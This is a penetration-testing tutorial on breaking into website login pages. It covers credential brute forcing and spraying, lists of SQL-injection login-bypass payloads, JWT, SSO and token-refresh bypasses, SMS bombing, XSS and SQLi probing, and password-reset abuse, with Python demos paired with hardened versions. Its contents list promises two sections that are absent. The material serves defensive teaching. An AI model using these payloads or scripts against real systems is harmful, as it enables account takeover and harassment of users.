Network security | Penetration testing case analysis, from zero to mastery: common test methods for quickly penetrating login pages

Table of contents

introduction

1. Weak passwords

2. Universal password (SQL injection) bypass

3. Login authentication bypass

3.1. Misconfigured token refresh endpoint

3.2. Incorrect SSO configuration

3.3. CMS case: portlet access problem

3.4. Incorrect parsing of JWT tokens

3.5. Forcibly modifying the authentication request

4. Image CAPTCHA not invalidated after use

5. SMS verification code not invalidated after use

6. SMS bombing

7. Reflected cross-site scripting

8. SQL injection

9. Arbitrary user password modification/reset

10. Sensitive information leakage

11. Directory traversal (directory listing)

12. Framework vulnerabilities


introduction

Today I would like to share the penetration techniques commonly used against a website's backend login page, so that everyone maintaining a site day to day knows where to focus their defenses.

1. Weak passwords

Test method:
1) Manually try a few high-frequency weak passwords such as the ones below.
2) Based on the third-party components the site uses, look up the component-specific weak or default passwords and try logging in with them.
3) Or go straight to Burp Suite (BP): brute-forcing a 6-digit purely numeric password takes only about 3 seconds. If the login locks the account or throttles after a few failures, switch to password spraying (one common password across many usernames) instead of iterating the keyspace on one account.

admin:123456
admin:admin
admin:admin@123
admin:12345
test:test

The 2022 top-20 weak password ranking compiled from security-team statistics follows.
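As an added example (not from the original post), a small Python harness for this test: it yields the high-frequency pairs first, then the 10^6 numeric keyspace for each username, and stops at the first response carrying a success marker. The target here is a constructed in-process stand-in (`fake_login`, with a made-up account and password) rather than a real HTTP endpoint; against a live site you would replace it with a function that POSTs the form and returns the response body.

```python
import time
from typing import Callable, Iterable, Iterator, Optional, Tuple

# High-frequency admin-panel pairs from the list above; a real test appends the
# default credentials of whatever third-party components the site exposes.
HIGH_FREQUENCY_PAIRS = [
    ("admin", "123456"), ("admin", "admin"), ("admin", "admin@123"),
    ("admin", "12345"), ("test", "test"),
]


def six_digit_pins() -> Iterator[str]:
    """The whole purely numeric 6-digit keyspace: 000000 .. 999999 (10^6 values)."""
    for n in range(10 ** 6):
        yield f"{n:06d}"


def candidates(usernames: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Cheap guesses first, then the numeric keyspace for each username."""
    yield from HIGH_FREQUENCY_PAIRS
    for user in usernames:
        for pin in six_digit_pins():
            yield user, pin


def spray(login: Callable[[str, str], str], usernames: Iterable[str],
          success_marker: str, max_attempts: int = 10 ** 7) -> Optional[Tuple[str, str, int]]:
    """Submit candidates until a response body contains success_marker.

    Returns (username, password, attempts_used) on a hit, or None.  Detecting
    success by a marker in the body (or by status code / redirect) is what makes
    the result reliable; the attempt count tells you how far an account lockout
    would have let you get.
    """
    attempts = 0
    for user, pw in candidates(usernames):
        if attempts >= max_attempts:
            break
        attempts += 1
        if success_marker in login(user, pw):
            return user, pw, attempts
    return None


# Constructed stand-in for the target.  Against a real site this function would
# POST the form (e.g. with requests) and return the response body instead.
_FAKE_ACCOUNTS = {"admin": "483920"}   # constructed: a 6-digit numeric password


def fake_login(user: str, pw: str) -> str:
    if _FAKE_ACCOUNTS.get(user) == pw:
        return '{"code":0,"msg":"login ok","redirect":"/admin/index"}'
    return '{"code":1,"msg":"wrong username or password"}'


if __name__ == "__main__":
    start = time.time()
    hit = spray(fake_login, ["admin"], "login ok")
    print(hit, f"{time.time() - start:.1f}s")   # ~half a million attempts in-process
```

The in-process run is fast because nothing goes over the network; against a real endpoint the same loop is bounded by round-trip time and by any lockout, which is exactly what the attempt counter lets you measure.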

2. Universal password (SQL injection) bypass

These "universal passwords" all rely on the login SQL being built by string concatenation, e.g. SELECT * FROM admin WHERE username='<user>' AND password='<pass>'. The quote closes the string literal, the OR makes the WHERE clause always true, and the comment (--, /*) or a null byte (%00) discards the rest of the query. They fail when the application uses prepared statements, and payloads in the password field fail when the password is hashed before it is put into the query (then only username-field payloads can work). Match the comment syntax to the database: -- for MS SQL, /* or -- followed by a space for MySQL.

Test methods:

(1) Username: ' or 1=1 or '   Password: anything
(2) Username: admin'-- (or ' or 1=1 or '--, or admin or 1=1 --) (MS SQL; the comment removes the password check, so only the username is entered)
(3) Username: admin   Password: ' or '1'='1   also works
(4) Username: admin' or 'a'='a   Password: anything
(5) Username: ' or 1=1 --
(6) Username: admin' or 1=1 --   Password: anything
(7) Username: 1'or'1'='1'or'1'='1   Password: anything

ASP / ASPX universal passwords
  1: "or "a"="a
  2: ')or('a'='a
  3: or 1=1--
  4: 'or 1=1--
  5: a'or' 1 =1--
  6: "or 1=1--
  7: 'or'a'='a
  8: "or"="a'='a
  9: 'or''='
  10: 'or'=' or'
  11: 1 or '1'='1'=1
  12: 1 or '1'='1' or 1=1
  13: 'OR 1=1%00
  14: "or 1=1%00
  15: 'xor
  16: newer universal login (UNION-based; works when the application fetches the row by username and then compares the password column in code, so the forged row supplies its own password):
      Username: username' UNION Select 1,1,1 FROM admin Where ''='   (replace admin with the real table name)
      Password: 1
      Username: -1%cf' union select 1,1,1 as password,1,1,1 %23   (%cf' is the wide-byte trick for escaped quotes on GBK MySQL; %23 is a URL-encoded # comment)
      Password: 1
  17: admin' or 'a'='a   Password: anything

PHP universal passwords
  'or'='or'
  'or 1=1/*   (string-type injection; the quote must reach the query unescaped, i.e. magic_quotes_gpc off or the input not escaped)
  User: something
  Pass: ' OR '1'='1

JSP universal passwords
  1'or'1'='1
  admin' OR 1=1/*
  Username: admin   (only works when this user exists in the system)
  Password: 1'or'1'='1
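The mechanism behind these lists, as an added Python example that is not part of the original post: two deliberately vulnerable login functions over a constructed in-memory SQLite table, fed with payloads from above, beside a parameterized version the same payloads cannot bypass. `login_concat` is the single-query pattern the OR payloads defeat; `login_two_step` is the fetch-by-username-then-compare pattern the UNION payload defeats, because the forged row carries the password the attacker typed. The table name `admin` and its rows are assumptions; SQLite accepts both `--` and `/*` comments, so it is a fair stand-in for MySQL/MSSQL here.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample table in the shape the payloads assume."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?,?,?)",
                     [(1, "admin", "S3cret!"), (2, "editor", "p@ss")])
    return conn


def login_concat(conn: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    """Pattern A (vulnerable): username and password concatenated into one query.
    An OR/comment payload in either field turns the WHERE clause true."""
    sql = f"SELECT username FROM admin WHERE username='{user}' AND password='{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_two_step(conn: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    """Pattern B (vulnerable): row fetched by username only, password compared in
    code.  OR payloads in the password field do nothing here, but a UNION in the
    username field returns a forged row whose password column the attacker chose."""
    sql = f"SELECT id, username, password FROM admin WHERE username='{user}'"
    row = conn.execute(sql).fetchone()
    if row is not None and str(row[2]) == pw:
        return str(row[1])
    return None


def login_safe(conn: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    """Fixed: bound parameters; the payloads are compared as literal strings."""
    row = conn.execute("SELECT username FROM admin WHERE username=? AND password=?",
                       (user, pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("' or 1=1 or '", "anything"), ("admin' --", "anything"),
                     ("admin", "' or '1'='1"), ("admin' or 'a'='a", "anything"),
                     ("1'or'1'='1'or'1'='1", "anything")]:
        print(f"{user!r:28} {pw!r:16} concat={login_concat(conn, user, pw)!s:6} "
              f"safe={login_safe(conn, user, pw)}")
    union = "x' UNION SELECT 1,1,1 FROM admin WHERE ''='"
    print("two-step UNION:", login_two_step(conn, union, "1"),
          "safe:", login_safe(conn, union, "1"))
```

The UNION case logs in as the literal user "1" because the forged row is (1,1,1); an attacker who wants a specific account puts 'admin' in the username column of the UNION instead.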

 

 

3. Login authentication bypass

Test methods:

1) Access internal URLs directly. Use a scanner to find paths containing words such as admin, manager, administrator and login, then try to open them as an ordinary logged-in user (or with no session at all) to obtain administrator privileges.
2) Modify parameters to bypass authentication. The application may use a parameter or a hidden field to record whether a user is authenticated; changing it makes you look like an authenticated user. For example, in http://www.xxx.xom/userinfo.jsp?authenticated=no change the authenticated parameter to yes, i.e. http://www.xxx.xom/userinfo.jsp?authenticated=yes, and you pass authentication and reach the internal page directly.
3) Guessable SessionID. Find the pattern in issued session IDs, predict a valid one, and replace the SessionID in your request with the predicted value to impersonate the session's real owner and skip authentication.
4) CSRF. Use a CSRF vulnerability to perform sensitive operations with the victim's existing session without their knowledge, bypassing authentication.
5) Front-end validation bypass: modify the return code in the response; typically try true, success, 200, 0, 1 and similar values.
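Item 3, as an added Python example that is not part of the original post: a check for counter-style session IDs. Given a few session IDs captured in order, it reads them as hex integers and, if every delta is small and positive, predicts the next one. `WeakSessionStore` and its starting value are a constructed stand-in for a server that issues sequential IDs; `secure_session_id` shows the fix (128 bits from the OS CSPRNG, nothing to extrapolate from).

```python
import secrets
from typing import List, Optional


def session_id_deltas(ids: List[str]) -> List[int]:
    """Differences between consecutive session IDs read as hex integers."""
    values = [int(s, 16) for s in ids]
    return [b - a for a, b in zip(values, values[1:])]


def predict_next_session_id(ids: List[str], max_step: int = 1000) -> Optional[str]:
    """If every delta between captured IDs is small and positive, the generator
    is a counter (or a coarse timestamp) and the next ID is guessable.
    Returns the predicted next ID, or None when no pattern is visible."""
    deltas = session_id_deltas(ids)
    if len(deltas) < 2 or any(d <= 0 or d > max_step for d in deltas):
        return None
    step = round(sum(deltas) / len(deltas))
    width = len(ids[-1])
    return f"{int(ids[-1], 16) + step:0{width}x}"


class WeakSessionStore:
    """Constructed stand-in for a server whose session IDs are a counter."""

    def __init__(self, start: int = 0x5F3E1A00) -> None:
        self._last = start

    def new_session(self) -> str:
        self._last += 1
        return f"{self._last:08x}"


def secure_session_id() -> str:
    """The fix: 128 bits from the OS CSPRNG."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    store = WeakSessionStore()
    captured = [store.new_session() for _ in range(4)]
    print("captured:", captured, "predicted next:", predict_next_session_id(captured))
    print("random IDs predictable?", predict_next_session_id([secure_session_id() for _ in range(6)]))
```

In practice capture a handful of IDs by logging in several times in a row; a constant or slowly growing delta is the tell, and the predicted value goes straight into the session cookie of a new request.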

3.1. Misconfigured token refresh endpoint

In this case, when a user logs into the application with valid credentials, an authentication token is created and used for subsequent authentication. The token expires after some time. Just before it expires, the client sends a request to the endpoint /refresh/tokenlogin with the username parameter, and a valid new auth token appears in the response. The misconfiguration is that the refresh endpoint issues the token on the strength of the username alone, without requiring the expiring token or any other proof of identity, so anyone who knows a valid username can obtain an authentication token for that account.

3.2. Incorrect SSO configuration

With the diversity of platforms and growing user needs, most platforms use an SSO system so that a user can authenticate once and log in to multiple applications and websites. But simply using SSO does not automatically secure the system: the SSO configuration itself must also be secure.

Here, an application authenticates through Microsoft SSO. When the URL internal.test.com is opened, the browser is redirected to the single sign-on system.

3.3. CMS case: portlet access problem

CMSs such as WordPress, Drupal and HubSpot also need to be securely configured to avoid vulnerabilities of this kind.

Here is a Liferay example, again found by coincidence. The application has a login page that can be reached without authentication.

Liferay uses a portlet as the login/SSO component of the application, and the portlet is selected by the numeric id parameter p_p_id. Setting p_p_id to 58 loads the login portlet. On the normal login page only the login form is reachable, but when the portlet is accessed directly the Create Account function is also exposed, so self-registration can be used to reach backend content without authorization.


3.4. Incorrect parsing of JWT tokens

JSON Web Tokens (JWT) are widely used on the Web. Although they carry a security mechanism by default, the signature made with a key, that says nothing about whether the backend's validation logic is secure.

There was a website using JWT that, when accessed directly, redirected the user to the Microsoft SSO web page.

However, some JS files could be accessed without authentication. Testing showed that the application uses JWT tokens issued after a successful Microsoft SSO login. The backend had a security misconfiguration: it did not check that the JWT had been issued for this specific application (the audience, carried in the aud claim), and instead accepted any JWT carrying a valid signature. The proof of concept used a JWT token obtained from Microsoft's own website.
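The two validators, as an added Python example that is not part of the original post. Microsoft-issued tokens are RS256-signed with published keys; to keep this self-contained it mints HS256 tokens with a constructed shared key, a constructed issuer URL and two constructed audiences, but the flaw is the same: `verify_loose` checks only the signature, so a token the same identity provider issued for a different application is accepted; `verify_strict` also checks iss, aud and exp.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed values: the identity provider's signing key and issuer URL, and the
# audiences of this portal and of another application registered at the same IdP.
IDP_KEY = b"constructed-idp-signing-key"
ISSUER = "https://idp.example/v2.0"
OUR_AUDIENCE = "api://portal.example"
OTHER_AUDIENCE = "api://other-app.example"
NOW = 1_700_000_000  # fixed clock so the example is deterministic


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_jwt(claims: dict, key: bytes) -> str:
    """Mint an HS256 token, standing in for the IdP (real Microsoft tokens are RS256)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def _signed_claims(token: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the signature (and the pinned algorithm) check out."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":        # never let the token choose the algorithm
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(payload_b64))


def verify_loose(token: str, key: bytes) -> Optional[dict]:
    """The misconfiguration: any token the IdP signed is accepted, whatever
    application it was issued for and whether or not it has expired."""
    return _signed_claims(token, key)


def verify_strict(token: str, key: bytes, issuer: str, audience: str,
                  now: Optional[float] = None) -> Optional[dict]:
    """Signature plus iss, aud and exp: a token for another app is rejected."""
    now = time.time() if now is None else now
    claims = _signed_claims(token, key)
    if claims is None or claims.get("iss") != issuer:
        return None
    aud = claims.get("aud")
    if aud != audience and not (isinstance(aud, list) and audience in aud):
        return None
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        return None
    return claims


# A token the IdP issued for this portal, and one it issued for another app.
PORTAL_TOKEN = issue_jwt({"iss": ISSUER, "aud": OUR_AUDIENCE, "sub": "alice", "exp": NOW + 3600}, IDP_KEY)
OTHER_APP_TOKEN = issue_jwt({"iss": ISSUER, "aud": OTHER_AUDIENCE, "sub": "mallory", "exp": NOW + 3600}, IDP_KEY)

if __name__ == "__main__":
    print("loose accepts other app's token :", verify_loose(OTHER_APP_TOKEN, IDP_KEY) is not None)
    print("strict accepts other app's token:", verify_strict(OTHER_APP_TOKEN, IDP_KEY, ISSUER, OUR_AUDIENCE, NOW) is not None)
    print("strict accepts portal token     :", verify_strict(PORTAL_TOKEN, IDP_KEY, ISSUER, OUR_AUDIENCE, NOW) is not None)
```

Against a real IdP the same three checks apply: pin the expected issuer and audience in configuration rather than reading them from the token, and treat a signature that verifies as necessary but not sufficient.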

 

3.5. Forcibly modifying the authentication request

In this case, a base64-encoded XML request is sent to the backend for validation. The login mechanism sends the username and password separately. The value of the Scode parameter is the MD5 hash of the password. There is another interesting flag in the request, with the value 2.

It turned out that authentication could be bypassed simply by providing a username and an empty password.


4. Image CAPTCHA not invalidated after use

Test method:

Enter the username, password and CAPTCHA, click the login button and intercept the request with Burp Suite, then replay it five times with the Repeater or Intruder module and watch whether the page starts reporting that the CAPTCHA is wrong. If the same CAPTCHA value keeps being accepted, it is not invalidated after use, and the CAPTCHA no longer stops password brute-forcing.

5. SMS verification code not invalidated after use

Test methods:

1) Request an SMS code, fill in an arbitrary value, then submit the follow-up request with the code parameter emptied or removed and test whether the check can be bypassed;
2) Try privileged (universal) codes such as 000000 and 111111;
3) Check whether the same SMS code can be used more than once;
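One added Python example (not from the original post) serving sections 4 and 5, since both are the same defect: a verification-code store whose `check` never consumes the code, beside a hardened store that rejects an empty or missing value, expires codes, limits guesses and deletes the code on first successful use. The key is the session ID for an image CAPTCHA or the phone number for an SMS code; the stores, the phone number and the timestamps are constructed.

```python
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple


class VulnerableCodeStore:
    """The defect from sections 4 and 5: the code is compared but never consumed,
    so a captured request replays forever."""

    def __init__(self) -> None:
        self.codes: Dict[str, str] = {}

    def issue(self, key: str) -> str:
        self.codes[key] = f"{secrets.randbelow(10 ** 6):06d}"
        return self.codes[key]

    def check(self, key: str, submitted: Optional[str]) -> bool:
        # Also passes when nothing was ever issued and the parameter is removed
        # (None == None): the "delete the parameter" bypass of section 5.
        return self.codes.get(key) == submitted


class HardenedCodeStore:
    def __init__(self, ttl_seconds: int = 300, max_attempts: int = 5) -> None:
        self.ttl = ttl_seconds
        self.max_attempts = max_attempts
        # key -> (code, expires_at, failed_attempts)
        self.codes: Dict[str, Tuple[str, float, int]] = {}

    def issue(self, key: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10 ** 6):06d}"
        self.codes[key] = (code, now + self.ttl, 0)   # re-issuing replaces the old code
        return code

    def check(self, key: str, submitted: Optional[str], now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        entry = self.codes.get(key)
        if entry is None or not submitted:            # missing or empty code is a failure, never a skip
            return False
        code, expires_at, failed = entry
        if now > expires_at or failed >= self.max_attempts:
            self.codes.pop(key, None)                 # expired or too many guesses: request a new one
            return False
        if not hmac.compare_digest(code.encode(), submitted.encode()):
            self.codes[key] = (code, expires_at, failed + 1)
            return False
        self.codes.pop(key, None)                     # consumed on success: a replay cannot reuse it
        return True


if __name__ == "__main__":
    weak = VulnerableCodeStore()
    code = weak.issue("session-1")
    print("vulnerable store accepts 5 replays:", all(weak.check("session-1", code) for _ in range(5)))
    strong = HardenedCodeStore()
    code = strong.issue("+8613800000000", now=1000)
    print("hardened first use:", strong.check("+8613800000000", code, now=1001),
          "replay:", strong.check("+8613800000000", code, now=1002))
```

The six-digit space is only 10^6 values, so without the attempt limit the expiry alone would not stop an Intruder run against the code field; the limit and the single-use rule together are what make the five-replay test from section 4 fail.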

6. SMS bombing

Test methods:

1) Manually locate the site's registration and authentication pages and check whether any of them sends an SMS; if so, go to the next step.
2) Capture the send-code request with Burp or another intercepting proxy and replay it. If the phone receives more than 10 messages in a short time, the send endpoint has no rate limit and the vulnerability exists.
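The replay test and the corresponding fix, as an added Python example that is not part of the original post: a send handler with no limit, where twelve replayed requests mean twelve messages, beside one with a per-number cooldown, a per-number daily cap and a per-IP hourly cap. The gateway, phone numbers, IPs and limits are constructed; the counters are kept in memory here, where a real deployment would keep them in a shared store.

```python
import time
from collections import defaultdict, deque
from typing import Deque, Dict, List, Optional, Tuple


class SmsGateway:
    """Constructed stand-in for the SMS provider: records what would be sent."""

    def __init__(self) -> None:
        self.sent: List[Tuple[str, float]] = []

    def send(self, phone: str, now: float) -> None:
        self.sent.append((phone, now))


def send_code_unlimited(gateway: SmsGateway, phone: str, now: float) -> bool:
    """The vulnerable handler: every replayed request produces another SMS."""
    gateway.send(phone, now)
    return True


class RateLimitedSender:
    """Per-number cooldown, per-number daily cap and per-IP hourly cap.  Replaying
    the captured request in a loop now yields one message, not ten."""

    def __init__(self, gateway: SmsGateway, cooldown: int = 60,
                 per_phone_per_day: int = 10, per_ip_per_hour: int = 20) -> None:
        self.gateway = gateway
        self.cooldown = cooldown
        self.per_phone_per_day = per_phone_per_day
        self.per_ip_per_hour = per_ip_per_hour
        self.phone_log: Dict[str, Deque[float]] = defaultdict(deque)
        self.ip_log: Dict[str, Deque[float]] = defaultdict(deque)

    @staticmethod
    def _prune(log: Deque[float], now: float, window: int) -> None:
        while log and log[0] <= now - window:
            log.popleft()

    def send_code(self, phone: str, client_ip: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        phone_hits, ip_hits = self.phone_log[phone], self.ip_log[client_ip]
        self._prune(phone_hits, now, 86400)
        self._prune(ip_hits, now, 3600)
        if phone_hits and now - phone_hits[-1] < self.cooldown:
            return False                                   # too soon for this number
        if len(phone_hits) >= self.per_phone_per_day or len(ip_hits) >= self.per_ip_per_hour:
            return False                                   # daily / hourly cap reached
        phone_hits.append(now)
        ip_hits.append(now)
        self.gateway.send(phone, now)
        return True


if __name__ == "__main__":
    gw = SmsGateway()
    for i in range(12):
        send_code_unlimited(gw, "+8613800000000", 1000 + i)
    print("unlimited handler sent:", len(gw.sent))
    gw2 = SmsGateway()
    sender = RateLimitedSender(gw2)
    for i in range(12):
        sender.send_code("+8613800000000", "10.0.0.1", now=1000 + i)
    print("rate-limited handler sent:", len(gw2.sent))
```

The per-IP cap matters because the replay in step 2 can just as easily rotate the phone number to bomb many victims from one source; the per-number limits alone would not catch that.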

 

 

7. Reflected cross-site scripting

Test methods:

1. GET-based cross-site scripting:
Append the following test strings to the input parameter one at a time; taking the first as an example, request http://www.exmaple.com/page.xxx?name=
Text input boxes: every place on the page that submits a parameter must be tested. The exact test strings depend on the context in which the input is reflected and can be constructed accordingly.
2. POST-based:
For example, capture the request and craft the parameter value to trigger the XSS.
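The reflection check, as an added Python example that is not part of the original post. It uses a harmless canary rather than a script tag as the first probe and reports, for each of `<`, `"` and `'`, whether the character comes back verbatim (exploitable), HTML-encoded (escaped) or not at all. The three page renderers are constructed stand-ins; for a live target, `render` would be a function that sends the GET or POST request and returns the body.

```python
import html
from typing import Callable, Dict

CANARY = "zxqv7r"   # constructed marker unlikely to appear in a normal page
PROBES = [f"<{CANARY}>", f'"{CANARY}"', f"'{CANARY}'"]


def reflection_context(body: str, probe: str) -> str:
    """'unescaped' if the probe came back verbatim (the metacharacter survived),
    'escaped' if only an encoded form of the canary is present, else 'absent'."""
    if probe in body:
        return "unescaped"
    if CANARY in body:
        return "escaped"
    return "absent"


def probe_parameter(render: Callable[[str], str]) -> Dict[str, str]:
    """render(value) must return the page body for one request with the
    parameter set to value (a GET query string or a POST field, as in the text)."""
    return {probe: reflection_context(render(probe), probe) for probe in PROBES}


def exploitable(results: Dict[str, str]) -> bool:
    """Any metacharacter reflected verbatim is enough to build a real payload."""
    return "unescaped" in results.values()


# Constructed stand-ins for the target page.
def vulnerable_page(name: str) -> str:
    return f"<h1>Welcome, {name}</h1>"


def fixed_page(name: str) -> str:
    return f"<h1>Welcome, {html.escape(name, quote=True)}</h1>"


def attribute_page(name: str) -> str:
    """Escapes angle brackets only: safe in text, exploitable inside an attribute."""
    safe = name.replace("<", "&lt;").replace(">", "&gt;")
    return f'<input type="text" value="{safe}">'


if __name__ == "__main__":
    for page in (vulnerable_page, fixed_page, attribute_page):
        results = probe_parameter(page)
        print(page.__name__, results, "exploitable:", exploitable(results))
```

The third renderer is why the quote probes matter: a page that strips `<` but reflects `"` inside an attribute is still injectable with `" onfocus=... autofocus` style payloads, which a `<script>`-only test would miss.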

8. SQL injection

Test methods:

1) Run a web vulnerability scanner over every link found by crawling the site, or judge by hand whether an injection point exists; once a vulnerability is confirmed, use the automated tool sqlmap to exploit it. Several common ways to judge:
a. Numeric type.
http://host/test.php?id=100 and 1=1   returns normally
http://host/test.php?id=100 and 1=2   returns a failure (error or empty result)
b. String type.
http://host/test.php?name=rainman' and '1'='1   returns normally
http://host/test.php?name=rainman' and '1'='2   returns a failure (error or empty result)
c. Search type.
A simple way to judge whether a search-type injection exists:
First search for ( ' ); if an error appears, there is roughly a 90% chance the vulnerability exists.
Then search for ( % ); if the page returns normally, roughly 95%.
Then search for a keyword, say (2006); all entries related to 2006 should come back.
Then search for (2006%' and 1=1 and '%'=') and (2006%' and 1=2 and '%'='); if the first returns the 2006 results and the second returns nothing, the search box is injectable.

Or simply enter a single quote ( ' ) as the username in the login box and see whether a database error is returned.
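The three boolean-based checks and the single-quote test, as an added Python example that is not part of the original post. They run against three constructed endpoints that concatenate their parameter into a query over an in-memory SQLite table (table, rows and endpoint names are assumptions). `boolean_probe` applies the page's rule: the `and 1=1` response must equal the normal one and differ from the `and 1=2` response; `error_probe` is the single-quote test. The parameterized endpoint at the end shows both probes correctly reporting nothing.

```python
import sqlite3
from typing import Callable, List, Tuple

Rows = List[Tuple]


def make_db() -> sqlite3.Connection:
    """Constructed sample data behind the three endpoints."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, author TEXT, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?,?,?)", [
        (100, "rainman", "2006 annual report"),
        (101, "alice", "2007 roadmap"),
        (102, "rainman", "notes from 2006"),
    ])
    return conn


CONN = make_db()


# Three deliberately vulnerable endpoints, one per injection type in the text.
def numeric_endpoint(value: str) -> Rows:        # ?id=100
    return CONN.execute(f"SELECT id, title FROM articles WHERE id={value}").fetchall()


def string_endpoint(value: str) -> Rows:         # ?name=rainman
    return CONN.execute(f"SELECT id, title FROM articles WHERE author='{value}'").fetchall()


def search_endpoint(value: str) -> Rows:         # ?q=2006
    return CONN.execute(f"SELECT id, title FROM articles WHERE title LIKE '%{value}%'").fetchall()


def string_endpoint_safe(value: str) -> Rows:    # the fix: bound parameter
    return CONN.execute("SELECT id, title FROM articles WHERE author=?", (value,)).fetchall()


def boolean_probe(endpoint: Callable[[str], Rows], base: str,
                  true_suffix: str, false_suffix: str) -> bool:
    """The page's rule: base and 'and 1=1' must agree, and differ from 'and 1=2'."""
    try:
        normal = endpoint(base)
        true_resp = endpoint(base + true_suffix)
        false_resp = endpoint(base + false_suffix)
    except sqlite3.Error:
        return False
    return normal != [] and normal == true_resp and true_resp != false_resp


def error_probe(endpoint: Callable[[str], Rows], base: str) -> bool:
    """The single-quote test: an unbalanced quote that errors out means the
    input reached the query unescaped."""
    try:
        endpoint(base + "'")
        return False
    except sqlite3.Error:
        return True


# Suffix pairs for the three injection types described above.
NUMERIC = (" and 1=1", " and 1=2")
STRING = ("' and '1'='1", "' and '1'='2")
SEARCH = ("%' and 1=1 and '%'='", "%' and 1=2 and '%'='")

if __name__ == "__main__":
    print("numeric :", boolean_probe(numeric_endpoint, "100", *NUMERIC))
    print("string  :", boolean_probe(string_endpoint, "rainman", *STRING))
    print("search  :", boolean_probe(search_endpoint, "2006", *SEARCH))
    print("safe    :", boolean_probe(string_endpoint_safe, "rainman", *STRING),
          error_probe(string_endpoint_safe, "rainman"))
```

Over HTTP the comparison is on response bodies rather than row lists, so normalise out anything that changes per request (timestamps, CSRF tokens) before comparing, or the `1=1` and normal responses will never match.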

9. Arbitrary user password modification/reset

Test method:
The password-change flow normally first verifies that the user's original password is correct and only then asks for a new password. There are roughly three ways to bypass it:

1) If the interface that takes the new password can be reached directly, the password can be changed without knowing the original one; usually knowing someone else's username is enough to change their password at will.
2) If the system does not verify the identity of the user changing the password, an attacker can submit the change request with the username or user ID replaced by another person's and successfully change that person's password.
3) If the change requires confirmation by e-mail or SMS but the application does not check the e-mail address or phone number the user supplies, an attacker can enter their own address or number, receive the reset link and code there, and use it to change someone else's password.
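An added Python example (not from the original post) contrasting a reset flow with all three defects against a hardened one. The accounts, addresses and the outbox that stands in for e-mail/SMS delivery are constructed in memory. In the vulnerable flow the user ID and the delivery address come from the request, and the new-password step needs no token; the hardened flow sends only to the address on file and binds the new-password step to a single-use token that by itself identifies the account.

```python
import secrets
from typing import Dict, List, Tuple


def make_users() -> Dict[str, dict]:
    """Constructed accounts; the attacker controls none of these addresses."""
    return {
        "alice": {"id": 1, "email": "alice@example.test", "password": "old-alice"},
        "bob":   {"id": 2, "email": "bob@example.test",   "password": "old-bob"},
    }


class VulnerableReset:
    """All three defects: the ID of the account being reset and the address the
    link goes to come from the request, and the new-password step needs no proof."""

    def __init__(self, users: Dict[str, dict]) -> None:
        self.users = users
        self.by_id = {u["id"]: name for name, u in users.items()}
        self.outbox: List[Tuple[str, str]] = []     # (recipient, token)
        self.tokens: Dict[str, int] = {}

    def request_reset(self, user_id: int, email: str) -> str:
        token = secrets.token_urlsafe(16)
        self.tokens[token] = user_id
        self.outbox.append((email, token))            # attacker-supplied recipient
        return token

    def set_new_password(self, user_id: int, new_password: str) -> bool:
        self.users[self.by_id[user_id]]["password"] = new_password   # no token, no identity check
        return True


class HardenedReset:
    def __init__(self, users: Dict[str, dict]) -> None:
        self.users = users
        self.by_id = {u["id"]: name for name, u in users.items()}
        self.outbox: List[Tuple[str, str]] = []
        self.tokens: Dict[str, int] = {}

    def request_reset(self, username: str) -> None:
        """The caller names only the account; the recipient is the address on file.
        Nothing is returned either way, so the response does not reveal which names exist."""
        user = self.users.get(username)
        if user is None:
            return
        token = secrets.token_urlsafe(32)
        self.tokens[token] = user["id"]
        self.outbox.append((user["email"], token))

    def set_new_password(self, token: str, new_password: str) -> bool:
        """The token alone identifies the account and is single-use; the request
        carries no user ID for an attacker to swap."""
        user_id = self.tokens.pop(token, None)
        if user_id is None:
            return False
        self.users[self.by_id[user_id]]["password"] = new_password
        return True


if __name__ == "__main__":
    users = make_users()
    weak = VulnerableReset(users)
    weak.request_reset(2, "attacker@evil.test")
    weak.set_new_password(2, "pwned")
    print("vulnerable: bob's password now", users["bob"]["password"], "link went to", weak.outbox[-1][0])
    users = make_users()
    strong = HardenedReset(users)
    strong.request_reset("bob")
    print("hardened: link went to", strong.outbox[-1][0], "guess accepted:",
          strong.set_new_password("guess", "x"))
```

When testing a real flow, the three requests to tamper with map onto this directly: the identifier in the reset request (defect 2), the address or number in it (defect 3), and whether the final set-password request still succeeds with the token removed (defect 1).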

10. Sensitive information leakage

Test methods:

1) With some patience, look through the page source and the JS files and search globally for sensitive words such as password and userlogin; unexpected finds are common.
